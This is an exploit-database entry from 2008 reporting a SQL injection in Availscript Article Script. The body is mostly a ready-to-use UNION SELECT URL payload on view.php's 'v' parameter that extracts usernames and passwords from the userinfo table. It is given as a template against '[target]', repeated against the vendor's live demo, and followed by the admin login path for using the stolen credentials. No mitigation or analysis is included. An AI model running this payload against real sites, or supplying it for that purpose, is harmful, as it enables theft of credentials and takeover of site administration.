id: 3717
date: 09/20/2008
title: Availscript Article Script (view.php v) SQL Injection Vulnerability
author: Hussin X
cves: 

===================================================================
Availscript Article Script (view.php v) SQL Injection Vulnerability
===================================================================



|___________________________________________________|
|
| Article Script (view.php v ) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|___________________________________________________
|                                                   |
|
| script : http://www.availscript.com/article_script.php
|
| DorK   : :)
|___________________________________________________|



Exploit:
________



www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--



L!VE DEMO:


http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--



Login :

www.[target].com/Script/admin/login.php



#  0day.today [2023-03-26]  #